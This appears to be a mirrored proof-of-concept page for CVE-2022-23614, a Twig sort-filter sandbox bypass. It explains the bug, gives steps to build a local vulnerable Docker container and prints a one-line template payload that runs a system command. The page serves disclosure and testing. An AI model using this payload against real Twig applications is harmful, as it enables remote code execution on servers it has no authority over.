Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-23614 PoC — Sensio Labs Twig 代码代码注入漏洞

Source
https://github.com/davwwwx/CVE-2022-23614
Associated Vulnerability
Title:Sensio Labs Twig 代码代码注入漏洞 (CVE-2022-23614)
Description:Sensio Labs Twig是法国Sensio Labs公司的一个PHP模板引擎,它支持自定义标签和过滤器,并创建DSL。 Sensio Labs Twig 存在代码注入漏洞,在沙箱模式下,sort过滤器的 arrow 参数必须是一个闭包,以避免攻击者利用该漏洞运行任意PHP函数。在受影响的版本中,这个约束没有被适当地强制执行,可能导致任意PHP代码的代码注入。
Description
PoC for CVE-2022-23614 (Twig sort filter code execution/sandbox bypass)
Readme
# CVE-2022-23614
PoC for [CVE-2022-23614](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23614), [GHSA-5mv2-rx3q-4w2v](https://github.com/twigphp/Twig/security/advisories/GHSA-5mv2-rx3q-4w2v) (Twig sort filter code execution/sandbox bypass)

As seen in this commit - [https://github.com/twigphp/Twig/commit/..](https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9), twig was passing user supplied function name as a callback parameter to [uasort](https://www.php.net/manual/en/function.uasort.php) ([here](https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9#diff-29e85e483c6ec4a9c2fd144820b6722c86df60d54175b355d85e806253313c1aR940)), thus leading to arbitrary code execution

To build and run the docker container with  a vulnerable twig version
```BASH
$ ./build-docker.sh
```

Open the webpage at localhost:1337 and try rendering the following payload

```Twig
{{ ['id','']|sort('system') }}
```

PoC
![PoC](/images/webpage.png)

Result
![Result](/images/result.png)
File Snapshot

 [4.0K]  /data/pocs/3ad2b6a2c969c83e95c2c017a1dc85bc0f251543
├── [ 112]  build-docker.sh
├── [4.0K]  config
│   ├── [2.6K]  httpd.conf
│   └── [ 272]  supervisord.conf
├── [ 818]  Dockerfile
├── [4.0K]  example
│   ├── [4.0K]  bin
│   │   └── [1.3K]  console
│   ├── [1.6K]  composer.json
│   ├── [ 85K]  composer.lock
│   ├── [4.0K]  config
│   │   ├── [ 239]  bundles.php
│   │   ├── [4.0K]  packages
│   │   │   ├── [ 687]  cache.yaml
│   │   │   ├── [ 526]  framework.yaml
│   │   │   ├── [4.0K]  prod
│   │   │   │   └── [  57]  routing.yaml
│   │   │   ├── [ 254]  routing.yaml
│   │   │   ├── [4.0K]  test
│   │   │   │   ├── [  85]  framework.yaml
│   │   │   │   └── [  33]  twig.yaml
│   │   │   └── [  77]  twig.yaml
│   │   ├── [4.0K]  routes
│   │   │   └── [4.0K]  dev
│   │   │       └── [  98]  framework.yaml
│   │   ├── [ 162]  routes.yaml
│   │   └── [ 899]  services.yaml
│   ├── [1.0K]  LICENSE
│   ├── [4.0K]  public
│   │   ├── [ 839]  index.php
│   │   └── [4.0K]  static
│   │       ├── [4.0K]  css
│   │       ├── [4.0K]  images
│   │       └── [4.0K]  js
│   ├── [4.0K]  src
│   │   ├── [4.0K]  Controller
│   │   │   └── [ 725]  DefaultController.php
│   │   ├── [1.4K]  Kernel.php
│   │   └── [4.0K]  Service
│   │       └── [ 390]  TemplateGenerator.php
│   ├── [4.1K]  symfony.lock
│   └── [4.0K]  templates
│       └── [4.0K]  site
│           └── [ 526]  index.html
├── [4.0K]  images
│   ├── [ 16K]  result.png
│   └── [ 24K]  webpage.png
└── [1.0K]  README.md

20 directories, 28 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.